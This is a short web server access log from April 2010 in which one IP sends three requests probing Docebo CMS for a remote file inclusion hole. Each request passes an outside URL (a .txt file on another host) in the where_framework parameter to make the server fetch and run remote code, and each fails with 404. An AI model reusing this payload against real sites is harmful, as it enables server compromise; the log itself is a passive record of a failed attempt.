124.49.100.254 - - [16/Apr/2010:13:39:44 -0500] "GET //docebo//doceboCms/class/class.dashboard_cms.php?where_framework=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:39:44 -0500] "GET /logs/access_log.1219363200%20%20//docebo//doceboCms/class/class.dashboard_cms.php?where_framework=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:39:44 -0500] "GET /logs//docebo//doceboCms/class/class.dashboard_cms.php?where_framework=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
